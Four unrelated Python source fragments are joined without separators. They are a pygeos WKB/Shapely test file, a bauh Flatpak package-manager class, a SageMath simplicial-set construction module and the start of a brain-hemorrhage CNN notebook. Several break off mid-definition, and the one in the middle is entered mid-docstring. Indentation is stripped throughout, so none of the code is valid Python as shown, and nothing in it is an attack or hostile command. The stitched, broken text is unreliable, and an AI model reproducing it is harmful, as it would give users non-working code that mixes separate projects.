(pygeos.geometrycollections([empty_point]), 3, GEOMETRYCOLLECTION_NAN_WKB),
(
pygeos.geometrycollections([pygeos.multipoints([empty_point])]),
2,
NESTED_COLLECTION_NAN_WKB,
),
(
pygeos.geometrycollections([pygeos.multipoints([empty_point])]),
3,
NESTED_COLLECTION_NAN_WKB,
),
],
)
def test_to_wkb_point_empty_post_geos38(geom, dims, expected):
# Post GEOS 3.8: empty point is 2D
actual = pygeos.to_wkb(geom, output_dimension=dims, byte_order=1)
# Use numpy.isnan; there are many byte representations for NaN
assert actual[: -2 * 8] == expected[: -2 * 8]
assert np.isnan(struct.unpack("<2d", actual[-2 * 8 :])).all()
@pytest.mark.parametrize(
"wkb,expected_type",
[
(POINT_NAN_WKB, 0),
(POINTZ_NAN_WKB, 0),
(MULTIPOINT_NAN_WKB, 4),
(MULTIPOINTZ_NAN_WKB, 4),
(GEOMETRYCOLLECTION_NAN_WKB, 7),
(GEOMETRYCOLLECTIONZ_NAN_WKB, 7),
(NESTED_COLLECTION_NAN_WKB, 7),
(NESTED_COLLECTIONZ_NAN_WKB, 7),
],
)
def test_from_wkb_point_empty(wkb, expected_type):
geom = pygeos.from_wkb(wkb)
# POINT (nan nan) transforms to an empty point
# Note that the dimensionality (2D/3D) is GEOS-version dependent
assert pygeos.is_empty(geom)
assert pygeos.get_type_id(geom) == expected_type
def test_to_wkb_point_empty_srid():
expected = pygeos.set_srid(empty_point, 4236)
wkb = pygeos.to_wkb(expected, include_srid=True)
actual = pygeos.from_wkb(wkb)
assert pygeos.get_srid(actual) == 4236
@pytest.mark.parametrize("geom", all_types)
@mock.patch("pygeos.io.ShapelyGeometry", ShapelyGeometryMock)
@mock.patch("pygeos.io.ShapelyPreparedGeometry", ShapelyPreparedMock)
@mock.patch("pygeos.io.shapely_compatible", True)
@mock.patch("pygeos.io._shapely_checked", True)
def test_from_shapely(geom):
actual = pygeos.from_shapely(ShapelyGeometryMock(geom))
assert isinstance(actual, pygeos.Geometry)
assert pygeos.equals(geom, actual)
assert geom._ptr != actual._ptr
@pytest.mark.parametrize("geom", all_types)
@mock.patch("pygeos.io.ShapelyGeometry", ShapelyGeometryMock)
@mock.patch("pygeos.io.ShapelyPreparedGeometry", ShapelyPreparedMock)
@mock.patch("pygeos.io.shapely_compatible", True)
@mock.patch("pygeos.io._shapely_checked", True)
def test_from_shapely_prepared(geom):
actual = pygeos.from_shapely(ShapelyPreparedMock(geom))
assert isinstance(actual, pygeos.Geometry)
assert pygeos.equals(geom, actual)
assert geom._ptr != actual._ptr
@mock.patch("pygeos.io.ShapelyGeometry", ShapelyGeometryMock)
@mock.patch("pygeos.io.ShapelyPreparedGeometry", ShapelyPreparedMock)
@mock.patch("pygeos.io.shapely_compatible", True)
@mock.patch("pygeos.io._shapely_checked", True)
def test_from_shapely_arr():
actual = pygeos.from_shapely([ShapelyGeometryMock(point), None])
assert pygeos.equals(point, actual[0])
@mock.patch("pygeos.io.ShapelyGeometry", ShapelyGeometryMock)
@mock.patch("pygeos.io.ShapelyPreparedGeometry", ShapelyPreparedMock)
@mock.patch("pygeos.io.shapely_compatible", True)
@mock.patch("pygeos.io._shapely_checked", True)
def test_from_shapely_none():
actual = pygeos.from_shapely(None)
assert actual is None
@pytest.mark.parametrize("geom", [1, 2.3, "x", ShapelyGeometryMock(None)])
@mock.patch("pygeos.io.ShapelyGeometry", ShapelyGeometryMock)
@mock.patch("pygeos.io.ShapelyPreparedGeometry", ShapelyPreparedMock)
@mock.patch("pygeos.io.shapely_compatible", True)
@mock.patch("pygeos.io._shapely_checked", True)
def test_from_shapely_error(geom):
with pytest.raises(TypeError):
pygeos.from_shapely(geom)
@pytest.mark.parametrize("geom", all_types)
@mock.patch("pygeos.io.ShapelyGeometry", ShapelyGeometryMock)
@mock.patch("pygeos.io.ShapelyPreparedGeometry", ShapelyPreparedMock)
@mock.patch("pygeos.io.shapely_compatible", False)
@mock.patch("pygeos.io._shapely_checked", True)
def test_from_shapely_incompatible(geom):
actual = pygeos.from_shapely(ShapelyGeometryMock(geom))
assert isinstance(actual, pygeos.Geometry)
assert pygeos.equals(geom, actual)
assert geom._ptr != actual._ptr
@pytest.mark.parametrize("geom", all_types)
@mock.patch("pygeos.io.ShapelyGeometry", ShapelyGeometryMock)
@mock.patch("pygeos.io.ShapelyPreparedGeometry", ShapelyPreparedMock)
@mock.patch("pygeos.io.shapely_compatible", False)
@mock.patch("pygeos.io._shapely_checked", True)
def test_from_shapely_incompatible_prepared(geom):
actual = pygeos.from_shapely(ShapelyPreparedMock(geom))
assert isinstance(actual, pygeos.Geometry)
assert pygeos.equals(geom, actual)
assert geom._ptr != actual._ptr
@mock.patch("pygeos.io.ShapelyGeometry", ShapelyGeometryMock)
@mock.patch("pygeos.io.ShapelyPreparedGeometry", ShapelyPreparedMock)
@mock.patch("pygeos.io.shapely_compatible", False)
@mock.patch("pygeos.io._shapely_checked", True)
def test_from_shapely_incompatible_none():
actual = pygeos.from_shapely(None)
assert actual is None
@mock.patch("pygeos.io.ShapelyGeometry", ShapelyGeometryMock)
@mock.patch("pygeos.io.ShapelyPreparedGeometry", ShapelyPreparedMock)
@mock.patch("pygeos.io.shapely_compatible", False)
@mock.patch("pygeos.io._shapely_checked", True)
def
import os
import re
import traceback
from datetime import datetime
from math import floor
from pathlib import Path
from threading import Thread
from typing import List, Set, Type, Tuple, Optional
from bauh.api.abstract.controller import SearchResult, SoftwareManager, ApplicationContext, UpgradeRequirements, \
UpgradeRequirement, TransactionResult
from bauh.api.abstract.disk import DiskCacheLoader
from bauh.api.abstract.handler import ProcessWatcher, TaskManager
from bauh.api.abstract.model import PackageHistory, PackageUpdate, SoftwarePackage, PackageSuggestion, \
SuggestionPriority, PackageStatus
from bauh.api.abstract.view import MessageType, FormComponent, SingleSelectComponent, InputOption, SelectViewType, \
ViewComponent, PanelComponent
from bauh.commons import user, internet
from bauh.commons.config import save_config
from bauh.commons.html import strip_html, bold
from bauh.commons.system import ProcessHandler
from bauh.gems.flatpak import flatpak, SUGGESTIONS_FILE, CONFIG_FILE, UPDATES_IGNORED_FILE, CONFIG_DIR, EXPORTS_PATH
from bauh.gems.flatpak.config import read_config
from bauh.gems.flatpak.constants import FLATHUB_API_URL
from bauh.gems.flatpak.model import FlatpakApplication
from bauh.gems.flatpak.worker import FlatpakAsyncDataLoader, FlatpakUpdateLoader
DATE_FORMAT = '%Y-%m-%dT%H:%M:%S.000Z'
RE_INSTALL_REFS = re.compile(r'\d+\)\s+(.+)')
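# Illustrative values (not taken from real output): DATE_FORMAT matches Flathub
# timestamps like '2019-07-10T12:30:45.000Z', and RE_INSTALL_REFS captures the
# ref from 'flatpak install' disambiguation prompts such as
# "1) app/org.gimp.GIMP/x86_64/stable".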
class FlatpakManager(SoftwareManager):
def __init__(self, context: ApplicationContext):
super(FlatpakManager, self).__init__(context=context)
self.i18n = context.i18n
self.api_cache = context.cache_factory.new()
self.category_cache = context.cache_factory.new()
context.disk_loader_factory.map(FlatpakApplication, self.api_cache)
self.enabled = True
self.http_client = context.http_client
self.suggestions_cache = context.cache_factory.new()
self.logger = context.logger
def get_managed_types(self) -> Set["type"]:
return {FlatpakApplication}
def _map_to_model(self, app_json: dict, installed: bool, disk_loader: DiskCacheLoader, internet: bool = True) -> FlatpakApplication:
app = FlatpakApplication(**app_json, i18n=self.i18n)
app.installed = installed
api_data = self.api_cache.get(app_json['id'])
expired_data = api_data and api_data.get('expires_at') and api_data['expires_at'] <= datetime.utcnow()
if not api_data or expired_data:
if not app.runtime:
if disk_loader:
disk_loader.fill(app) # preloading cached disk data
if internet:
FlatpakAsyncDataLoader(app=app, api_cache=self.api_cache, manager=self,
context=self.context, category_cache=self.category_cache).start()
else:
app.fill_cached_data(api_data)
app.status = PackageStatus.READY
return app
def _get_search_remote(self) -> str:
remotes = flatpak.list_remotes()
if remotes['system']:
remote_level = 'system'
elif remotes['user']:
remote_level = 'user'
else:
remote_level = 'user'
ProcessHandler().handle_simple(flatpak.set_default_remotes(remote_level))
return remote_level
def search(self, words: str, disk_loader: DiskCacheLoader, limit: int = -1, is_url: bool = False) -> SearchResult:
if is_url:
return SearchResult([], [], 0)
remote_level = self._get_search_remote()
res = SearchResult([], [], 0)
apps_found = flatpak.search(flatpak.get_version(), words, remote_level)
if apps_found:
already_read = set()
installed_apps = self.read_installed(disk_loader=disk_loader, internet_available=True).installed
if installed_apps:
for app_found in apps_found:
for installed_app in installed_apps:
if app_found['id'] == installed_app.id:
res.installed.append(installed_app)
already_read.add(app_found['id'])
if len(apps_found) > len(already_read):
for app_found in apps_found:
if app_found['id'] not in already_read:
res.new.append(self._map_to_model(app_found, False, disk_loader))
res.total = len(res.installed) + len(res.new)
return res
def _add_updates(self, version: str, output: list):
output.append(flatpak.list_updates_as_str(version))
def read_installed(self, disk_loader: DiskCacheLoader, limit: int = -1, only_apps: bool = False, pkg_types: Set[Type[SoftwarePackage]] = None, internet_available: bool = None) -> SearchResult:
version = flatpak.get_version()
updates = []
if internet_available:
thread_updates = Thread(target=self._add_updates, args=(version, updates))
thread_updates.start()
else:
thread_updates = None
installed = flatpak.list_installed(version)
models = []
if installed:
update_map = None
if thread_updates:
thread_updates.join()
update_map = updates[0]
for app_json in installed:
model = self._map_to_model(app_json=app_json, installed=True,
disk_loader=disk_loader, internet=internet_available)
model.update = None
models.append(model)
if update_map and (update_map['full'] or update_map['partial']):
if version >= '1.4.0':
update_id = '{}/{}/{}'.format(app_json['id'], app_json['branch'], app_json['installation'])
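                        # e.g. 'org.gimp.GIMP/stable/user' -- an illustrative
                        # id/branch/installation triple, not a real listing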
if update_map['full'] and update_id in update_map['full']:
model.update = True
if update_map['partial']:
for partial in update_map['partial']:
partial_data = partial.split('/')
if app_json['id'] in partial_data[0] and\
app_json['branch'] == partial_data[1] and\
app_json['installation'] == partial_data[2]:
partial_model = model.gen_partial(partial.split('/')[0])
partial_model.update = True
models.append(partial_model)
else:
model.update = '{}/{}'.format(app_json['installation'], app_json['ref']) in update_map['full']
if models:
ignored = self._read_ignored_updates()
if ignored:
for model in models:
if model.get_update_ignore_key() in ignored:
model.updates_ignored = True
return SearchResult(models, None, len(models))
def downgrade(self, pkg: FlatpakApplication, root_password: str, watcher: ProcessWatcher) -> bool:
if not self._make_exports_dir(watcher):
return False
watcher.change_progress(10)
watcher.change_substatus(self.i18n['flatpak.downgrade.commits'])
history = self.get_history(pkg)
        # downgrade is not possible if the app's current commit is already the oldest one:
if history.pkg_status_idx == len(history.history) - 1:
watcher.show_message(self.i18n['flatpak.downgrade.impossible.title'],
self.i18n['flatpak.downgrade.impossible.body'].format(bold(pkg.name)),
MessageType.ERROR)
return False
commit = history.history[history.pkg_status_idx + 1]['commit']
watcher.change_substatus(self.i18n['flatpak.downgrade.reverting'])
watcher.change_progress(50)
success, _ = ProcessHandler(watcher).handle_simple(flatpak.downgrade(pkg.ref,
commit,
pkg.installation,
root_password))
watcher.change_progress(100)
return success
def clean_cache_for(self, pkg: FlatpakApplication):
super(FlatpakManager, self).clean_cache_for(pkg)
self.api_cache.delete(pkg.id)
def upgrade(self, requirements: UpgradeRequirements, root_password: str, watcher: ProcessWatcher) -> bool:
flatpak_version = flatpak.get_version()
if not self._make_exports_dir(watcher):
return False
for req in requirements.to_upgrade:
watcher.change_status("{} {} ({})...".format(self.i18n['manage_window.status.upgrading'], req.pkg.name, req.pkg.version))
related, deps = False, False
ref = req.pkg.ref
if req.pkg.partial and flatpak_version < '1.5':
related, deps = True, True
ref = req.pkg.base_ref
try:
res, _ = ProcessHandler(watcher).handle_simple(flatpak.update(app_ref=ref,
installation=req.pkg.installation,
related=related,
deps=deps))
watcher.change_substatus('')
if not res:
self.logger.warning("Could not upgrade '{}'".format(req.pkg.id))
return False
except:
watcher.change_substatus('')
self.logger.error("An error occurred while upgrading '{}'".format(req.pkg.id))
traceback.print_exc()
return False
watcher.change_substatus('')
return True
def uninstall(self, pkg: FlatpakApplication, root_password: str, watcher: ProcessWatcher, disk_loader: DiskCacheLoader) -> TransactionResult:
if not self._make_exports_dir(watcher):
return TransactionResult.fail()
uninstalled, _ = ProcessHandler(watcher).handle_simple(flatpak.uninstall(pkg.ref, pkg.installation))
if uninstalled:
if self.suggestions_cache:
self.suggestions_cache.delete(pkg.id)
self.revert_ignored_update(pkg)
return TransactionResult(success=True, installed=None, removed=[pkg])
return TransactionResult.fail()
def get_info(self, app: FlatpakApplication) -> dict:
if app.installed:
version = flatpak.get_version()
id_ = app.base_id if app.partial and version < '1.5' else app.id
app_info = flatpak.get_app_info_fields(id_, app.branch, app.installation)
if app.partial and version < '1.5':
app_info['id'] = app.id
app_info['ref'] = app.ref
app_info['name'] = app.name
app_info['type'] = 'runtime' if app.runtime else 'app'
app_info['description'] = strip_html(app.description) if app.description else ''
if app.installation:
app_info['installation'] = app.installation
if app_info.get('installed'):
app_info['installed'] = app_info['installed'].replace('?', ' ')
return app_info
else:
res = self.http_client.get_json('{}/apps/{}'.format(FLATHUB_API_URL, app.id))
if res:
if res.get('categories'):
res['categories'] = [c.get('name') for c in res['categories']]
for to_del in ('screenshots', 'iconMobileUrl', 'iconDesktopUrl'):
if res.get(to_del):
del res[to_del]
for to_strip in ('description', 'currentReleaseDescription'):
if res.get(to_strip):
res[to_strip] = strip_html(res[to_strip])
for to_date in ('currentReleaseDate', 'inStoreSinceDate'):
if res.get(to_date):
try:
res[to_date] = datetime.strptime(res[to_date], DATE_FORMAT)
except:
self.context.logger.error('Could not convert date string {} as {}'.format(res[to_date], DATE_FORMAT))
pass
return res
else:
return {}
def get_history(self, pkg: FlatpakApplication) -> PackageHistory:
pkg.commit = flatpak.get_commit(pkg.id, pkg.branch, pkg.installation)
commits = flatpak.get_app_commits_data(pkg.ref, pkg.origin, pkg.installation)
status_idx = 0
commit_found = False
if pkg.commit is None and len(commits) > 1 and commits[0]['commit'] == '(null)':
del commits[0]
            pkg.commit = commits[0]['commit']
commit_found = True
if not commit_found:
for idx, data in enumerate(commits):
if data['commit'] == pkg.commit:
status_idx = idx
commit_found = True
break
if not commit_found and pkg.commit and commits[0]['commit'] == '(null)':
commits[0]['commit'] = pkg.commit
return PackageHistory(pkg=pkg, history=commits, pkg_status_idx=status_idx)
def _make_exports_dir(self, watcher: ProcessWatcher) -> bool:
if not os.path.exists(EXPORTS_PATH):
self.logger.info("Creating dir '{}'".format(EXPORTS_PATH))
watcher.print('Creating dir {}'.format(EXPORTS_PATH))
try:
Path(EXPORTS_PATH).mkdir(parents=True, exist_ok=True)
except:
watcher.print('Error while creating the directory {}'.format(EXPORTS_PATH))
return False
return True
def install(self, pkg: FlatpakApplication, root_password: str, disk_loader: DiskCacheLoader, watcher: ProcessWatcher) -> TransactionResult:
config = read_config()
install_level = config['installation_level']
if install_level is not None:
self.logger.info("Default Flaptak installation level defined: {}".format(install_level))
if install_level not in ('user', 'system'):
watcher.show_message(title=self.i18n['error'].capitalize(),
body=self.i18n['flatpak.install.bad_install_level.body'].format(field=bold('installation_level'),
file=bold(CONFIG_FILE)),
type_=MessageType.ERROR)
return TransactionResult(success=False, installed=[], removed=[])
pkg.installation = install_level
else:
user_level = watcher.request_confirmation(title=self.i18n['flatpak.install.install_level.title'],
body=self.i18n['flatpak.install.install_level.body'].format(bold(pkg.name)),
confirmation_label=self.i18n['no'].capitalize(),
deny_label=self.i18n['yes'].capitalize())
pkg.installation = 'user' if user_level else 'system'
remotes = flatpak.list_remotes()
handler = ProcessHandler(watcher)
if pkg.installation == 'user' and not remotes['user']:
handler.handle_simple(flatpak.set_default_remotes('user'))
elif pkg.installation == 'system' and not remotes['system']:
if user.is_root():
handler.handle_simple(flatpak.set_default_remotes('system'))
else:
user_password, valid = watcher.request_root_password()
if not valid:
watcher.print('Operation aborted')
return TransactionResult(success=False, installed=[], removed=[])
else:
if not handler.handle_simple(flatpak.set_default_remotes('system', user_password))[0]:
watcher.show_message(title=self.i18n['error'].capitalize(),
body=self.i18n['flatpak.remotes.system_flathub.error'],
type_=MessageType.ERROR)
watcher.print("Operation cancelled")
return TransactionResult(success=False, installed=[], removed=[])
# retrieving all installed so it will be possible to know the additional installed runtimes after the operation succeeds
flatpak_version = flatpak.get_version()
installed = flatpak.list_installed(flatpak_version)
installed_by_level = {'{}:{}:{}'.format(p['id'], p['name'], p['branch']) for p in installed if p['installation'] == pkg.installation} if installed else None
if not self._make_exports_dir(handler.watcher):
return TransactionResult(success=False, installed=[], removed=[])
installed, output = handler.handle_simple(flatpak.install(str(pkg.id), pkg.origin, pkg.installation))
if not installed and 'error: No ref chosen to resolve matches' in output:
ref_opts = RE_INSTALL_REFS.findall(output)
if ref_opts and len(ref_opts) > 1:
view_opts = [InputOption(label=o, value=o.strip()) for o in ref_opts if o]
ref_select = SingleSelectComponent(type_=SelectViewType.RADIO, options=view_opts, default_option=view_opts[0], label='')
if watcher.request_confirmation(title=self.i18n['flatpak.install.ref_choose.title'],
body=self.i18n['flatpak.install.ref_choose.body'].format(bold(pkg.name)),
components=[ref_select],
confirmation_label=self.i18n['proceed'].capitalize(),
deny_label=self.i18n['cancel'].capitalize()):
ref = ref_select.get_selected()
installed, output = handler.handle_simple(flatpak.install(ref, pkg.origin, pkg.installation))
pkg.ref = ref
pkg.runtime = 'runtime' in ref
else:
watcher.print('Aborted by the user')
return TransactionResult.fail()
else:
return TransactionResult.fail()
if installed:
try:
fields = flatpak.get_fields(str(pkg.id), pkg.branch, ['Ref', 'Branch'])
if fields:
pkg.ref = fields[0]
pkg.branch = fields[1]
except:
traceback.print_exc()
if installed:
new_installed = [pkg]
current_installed = flatpak.list_installed(flatpak_version)
current_installed_by_level = [p for p in current_installed if p['installation'] == pkg.installation] if current_installed else None
if current_installed_by_level and (not installed_by_level or len(current_installed_by_level) > len(installed_by_level) + 1):
pkg_key = '{}:{}:{}'.format(pkg.id, pkg.name, pkg.branch)
net_available = internet.is_available()
for p in current_installed_by_level:
current_key = '{}:{}:{}'.format(p['id'], p['name'], p['branch'])
if current_key != pkg_key and (not installed_by_level or current_key not in installed_by_level):
new_installed.append(self._map_to_model(app_json=p, installed=True,
disk_loader=disk_loader, internet=net_available))
return TransactionResult(success=installed, installed=new_installed, removed=[])
else:
return TransactionResult.fail()
def is_enabled(self):
return self.enabled
def set_enabled(self, enabled: bool):
self.enabled = enabled
def can_work(self) -> bool:
return flatpak.is_installed()
def requires_root(self, action: str, pkg: FlatpakApplication):
return action == 'downgrade' and pkg.installation == 'system'
def prepare(self, task_manager: TaskManager, root_password: str, internet_available: bool):
Thread(target=read_config, args=(True,), daemon=True).start()
def list_updates(self, internet_available: bool) -> List[PackageUpdate]:
updates = []
installed = self.read_installed(None, internet_available=internet_available).installed
        # keep only packages flagged with an available update and not ignored
        to_update = [p for p in installed if p.update and not p.updates_ignored]
            sage: RPoo = simplicial_sets.RealProjectiveSpace(Infinity)
sage: latex(S2.product(RPoo, S2))
S^{2} \times RP^{\infty} \times S^{2}
"""
return ' \\times '.join([latex(X) for X in self._factors])
class ProductOfSimplicialSets_finite(ProductOfSimplicialSets, PullbackOfSimplicialSets_finite):
r"""
The product of finite simplicial sets.
When the factors are all finite, there are more methods available
for the resulting product, as compared to products with infinite
factors: projection maps, the wedge as a subcomplex, and the fat
wedge as a subcomplex. See :meth:`projection_map`,
    :meth:`wedge_as_subset`, and :meth:`fat_wedge_as_subset`.
"""
def __init__(self, factors=None):
r"""
Return the product of finite simplicial sets.
See :class:`ProductOfSimplicialSets` for more information.
EXAMPLES::
sage: from sage.topology.simplicial_set import AbstractSimplex, SimplicialSet
sage: v = AbstractSimplex(0, name='v')
sage: e = AbstractSimplex(1)
sage: X = SimplicialSet({e: (v, v)})
sage: W = X.product(X, X)
sage: W.homology()
{0: 0, 1: Z x Z x Z, 2: Z x Z x Z, 3: Z}
sage: W.is_pointed()
False
sage: X = X.set_base_point(v)
sage: w = AbstractSimplex(0, name='w')
sage: f = AbstractSimplex(1)
sage: Y = SimplicialSet({f: (v,w)}, base_point=w)
sage: Z = Y.product(X)
sage: Z.is_pointed()
True
sage: Z.base_point()
(w, v)
"""
PullbackOfSimplicialSets_finite.__init__(self, [space.constant_map()
for space in factors])
self._factors = tuple([f.domain() for f in self._maps])
def projection_map(self, i):
"""
        Return the map projecting onto the `i`-th factor.
INPUT:
- ``i`` -- integer, the index of the projection map
EXAMPLES::
sage: T = simplicial_sets.Torus()
sage: f_0 = T.projection_map(0)
sage: f_1 = T.projection_map(1)
sage: m_0 = f_0.induced_homology_morphism().to_matrix(1) # matrix in dim 1
sage: m_1 = f_1.induced_homology_morphism().to_matrix(1)
sage: m_0.rank()
1
sage: m_0 == m_1
False
"""
return self.structure_map(i)
def wedge_as_subset(self):
"""
Return the wedge as a subsimplicial set of this product of pointed
simplicial sets.
This will raise an error if any factor is not pointed.
EXAMPLES::
sage: from sage.topology.simplicial_set import AbstractSimplex, SimplicialSet
sage: v = AbstractSimplex(0, name='v')
sage: e = AbstractSimplex(1, name='e')
sage: w = AbstractSimplex(0, name='w')
sage: f = AbstractSimplex(1, name='f')
sage: X = SimplicialSet({e: (v, v)}, base_point=v)
sage: Y = SimplicialSet({f: (w, w)}, base_point=w)
sage: P = X.product(Y)
sage: W = P.wedge_as_subset()
sage: W.nondegenerate_simplices()
[(v, w), (e, s_0 w), (s_0 v, f)]
sage: W.homology()
{0: 0, 1: Z x Z}
"""
basept_factors = [sset.base_point() for sset in self.factors()]
        to_factors = {v: k for k, v in self._translation}
simps = []
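        # A simplex of the product lies in the wedge exactly when at most one
        # of its factor coordinates differs from (a degeneracy of) that
        # factor's base point, so count the non-base-point coordinates.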
for x in self.nondegenerate_simplices():
simplices = to_factors[x]
not_base_pt = 0
for sigma, star in zip(simplices, basept_factors):
if not_base_pt > 1:
continue
if sigma[0].nondegenerate() != star:
not_base_pt += 1
if not_base_pt <= 1:
simps.append(x)
return self.subsimplicial_set(simps)
def fat_wedge_as_subset(self):
"""
Return the fat wedge as a subsimplicial set of this product of
pointed simplicial sets.
The fat wedge consists of those terms where at least one
factor is the base point. Thus with two factors this is the
ordinary wedge, but with more factors, it is larger.
EXAMPLES::
sage: S1 = simplicial_sets.Sphere(1)
sage: X = S1.product(S1, S1)
sage: W = X.fat_wedge_as_subset()
sage: W.homology()
{0: 0, 1: Z x Z x Z, 2: Z x Z x Z}
"""
basept_factors = [sset.base_point() for sset in self.factors()]
to_factors = {v: k for k, v in self._translation}
simps = []
for x in self.nondegenerate_simplices():
simplices = to_factors[x]
combined = zip(simplices, basept_factors)
if any(sigma[0] == pt for (sigma, pt) in combined):
simps.append(x)
return self.subsimplicial_set(simps)
class PushoutOfSimplicialSets(SimplicialSet_arbitrary, UniqueRepresentation):
@staticmethod
def __classcall_private__(cls, maps=None, vertex_name=None):
"""
TESTS::
sage: from sage.topology.simplicial_set_constructions import PushoutOfSimplicialSets
sage: S2 = simplicial_sets.Sphere(2)
sage: one = S2.Hom(S2).identity()
sage: PushoutOfSimplicialSets([one, one]) == PushoutOfSimplicialSets((one, one))
True
"""
if maps:
return super(PushoutOfSimplicialSets, cls).__classcall__(cls, maps=tuple(maps),
vertex_name=vertex_name)
return super(PushoutOfSimplicialSets, cls).__classcall__(cls, vertex_name=vertex_name)
def __init__(self, maps=None, vertex_name=None):
r"""
Return the pushout obtained from the morphisms ``maps``.
INPUT:
- ``maps`` -- a list or tuple of morphisms of simplicial sets
- ``vertex_name`` -- optional, default ``None``
If only a single map `f: X \to Y` is given, then return
`Y`. If no maps are given, return the empty simplicial
set. Otherwise, given a simplicial set `X` and maps `f_i: X
\to Y_i` for `0 \leq i \leq m`, construct the pushout `P`: see
:wikipedia:`Pushout_(category_theory)`. This is constructed as
pushouts of sets for each set of `n`-simplices, so `P_n` is
the disjoint union of the sets `(Y_i)_n`, with elements
`f_i(x)` identified for `n`-simplex `x` in `X`.
Simplices in the pushout are given names as follows: if a
simplex comes from a single `Y_i`, it inherits its
name. Otherwise it must come from a simplex (or several) in
`X`, and then it inherits one of those names, and it should be
the first alphabetically. For example, if vertices `v`, `w`,
and `z` in `X` are glued together, then the resulting vertex
in the pushout will be called `v`.
Base points are taken care of automatically: if each of the
maps `f_i` is pointed, so is the pushout. If `X` is a point or
if `X` is nonempty and any of the spaces `Y_i` is a point, use
those for the base point. In all of these cases, if
``vertex_name`` is ``None``, generate the name of the base
point automatically; otherwise, use ``vertex_name`` for its
name.
In all other cases, the pushout is not pointed.
EXAMPLES::
sage: from sage.topology.simplicial_set import AbstractSimplex, SimplicialSet
sage: v = AbstractSimplex(0, name='v')
sage: a = AbstractSimplex(0, name='a')
sage: b = AbstractSimplex(0, name='b')
sage: c = AbstractSimplex(0, name='c')
sage: e0 = AbstractSimplex(1, name='e_0')
sage: e1 = AbstractSimplex(1, name='e_1')
sage: e2 = AbstractSimplex(1, name='e_2')
sage: X = SimplicialSet({e2: (b, a)})
sage: Y0 = SimplicialSet({e2: (b,a), e0: (c,b), e1: (c,a)})
sage: Y1 = simplicial_sets.Simplex(0)
sage: f0_data = {a:a, b:b, e2: e2}
sage: v = Y1.n_cells(0)[0]
sage: f1_data = {a:v, b:v, e2:v.apply_degeneracies(0)}
sage: f0 = X.Hom(Y0)(f0_data)
sage: f1 = X.Hom(Y1)(f1_data)
sage: P = X.pushout(f0, f1)
sage: P.nondegenerate_simplices()
[a, c, e_0, e_1]
There are defining maps `f_i: X \to Y_i` and structure maps
`\bar{f}_i: Y_i \to P`; the latter are only implemented in
Sage when each `Y_i` is finite. ::
sage: P.defining_map(0) == f0
True
sage: P.structure_map(1)
Simplicial set morphism:
From: 0-simplex
To: Pushout of maps:
Simplicial set morphism:
From: Simplicial set with 3 non-degenerate simplices
To: Simplicial set with 6 non-degenerate simplices
Defn: [a, b, e_2] --> [a, b, e_2]
Simplicial set morphism:
From: Simplicial set with 3 non-degenerate simplices
To: 0-simplex
Defn: Constant map at (0,)
Defn: Constant map at a
sage: P.structure_map(0).domain() == Y0
True
sage: P.structure_map(0).codomain() == P
True
An inefficient way of constructing a suspension for an
unpointed set: take the pushout of two copies of the inclusion
map `X \to CX`::
sage: T = simplicial_sets.Torus()
sage: T = T.unset_base_point()
sage: CT = T.cone()
sage: inc = CT.base_as_subset().inclusion_map()
sage: P = T.pushout(inc, inc)
sage: P.homology()
{0: 0, 1: 0, 2: Z x Z, 3: Z}
sage: len(P.nondegenerate_simplices())
20
It is more efficient to construct the suspension as the
quotient `CX/X`::
sage: len(CT.quotient(CT.base_as_subset()).nondegenerate_simplices())
8
It is more efficient still if the original simplicial set has
a base point::
sage: T = simplicial_sets.Torus()
sage: len(T.suspension().nondegenerate_simplices())
6
sage: S1 = simplicial_sets.Sphere(1)
sage: pt = simplicial_sets.Point()
sage: bouquet = pt.pushout(S1.base_point_map(), S1.base_point_map(), S1.base_point_map())
sage: bouquet.homology(1)
Z x Z x Z
"""
# Import this here to prevent circular imports.
from sage.topology.simplicial_set_morphism import SimplicialSetMorphism
if maps and any(not isinstance(f, SimplicialSetMorphism) for f in maps):
raise ValueError('the maps must be morphisms of simplicial sets')
Cat = SimplicialSets()
if maps:
if all(f.codomain().is_finite() for f in maps):
Cat = Cat.Finite()
if all(f.is_pointed() for f in maps):
Cat = Cat.Pointed()
Parent.__init__(self, category=Cat)
self._maps = maps
self._n_skeleton = (-1, Empty())
self._vertex_name = vertex_name
def n_skeleton(self, n):
"""
Return the `n`-skeleton of this simplicial set.
That is, the simplicial set generated by all nondegenerate
simplices of dimension at most `n`.
INPUT:
- ``n`` -- the dimension
The `n`-skeleton of the pushout is computed as the pushout
of the `n`-skeleta of the component simplicial sets.
EXAMPLES::
sage: B = simplicial_sets.ClassifyingSpace(groups.misc.MultiplicativeAbelian([2]))
sage: K = B.n_skeleton(3)
sage: Q = K.pushout(K.inclusion_map(), K.constant_map())
sage: Q.n_skeleton(5).homology()
{0: 0, 1: 0, 2: 0, 3: 0, 4: Z, 5: Z}
Of course, computing the `n`-skeleton and then taking homology
        need not give the same answer as the homology of the pushout itself.
<filename>Predicting_of_Brain_Hemorr_using_CNN_Module.py<gh_stars>0
#!/usr/bin/env python
# coding: utf-8
# # FUNCTIONS AND CLASSES FOR AL FINAL PROJECT
# In[1]:
import os
import sys
import shutil
import itertools
from itertools import combinations

import cv2
# import PIL  # optional
import pydicom
import pydicom as dicom
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import pandas as pd
import tensorflow as tf
#tf.enable_eager_execution()
from sklearn.preprocessing import OneHotEncoder
from keras.models import Sequential
from keras.models import Model
from keras_preprocessing.image import ImageDataGenerator
from keras.layers import Input,concatenate, multiply, Reshape, Lambda, Conv2D, MaxPooling2D, Dense, Activation, Flatten, Dropout, BatchNormalization, AveragePooling2D,ZeroPadding2D
from keras import regularizers, optimizers
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.neighbors import KernelDensity
# # Functions
# In[2]:
# set PNG=True if you want PNG output instead of JPG
def convert_dicom(folder_path_from, folder_path_to, PNG = False):
""" Converts dicom image format to jpg or png
folder_path_from -- path to get images from for conversion
folder_path_to -- path to copy imgs to
"""
images_path = os.listdir(folder_path_from)
for n, image in enumerate(images_path):
ds = dicom.dcmread(os.path.join(folder_path_from, image))
pixel_array_numpy = ds.pixel_array
if PNG == False:
image = image.replace('.dcm', '.jpg')
else:
image = image.replace('.dcm', '.png')
cv2.imwrite(os.path.join(folder_path_to, image), pixel_array_numpy)
#os.remove(os.path.join(folder_path_from, image))
return None
def remove_damage_img(df1, path):
"""remove damage image(s) that couldn't be read by pydicom or images that
are not 512, 512 from dataframe.
returns: tuple of (number of images remove, modified df)
Warning: run function only once.
"""
df = df1.copy()
dcm_img_path = [] # list to store path to images
w = 512
l = 512
num_of_damage_img = 0
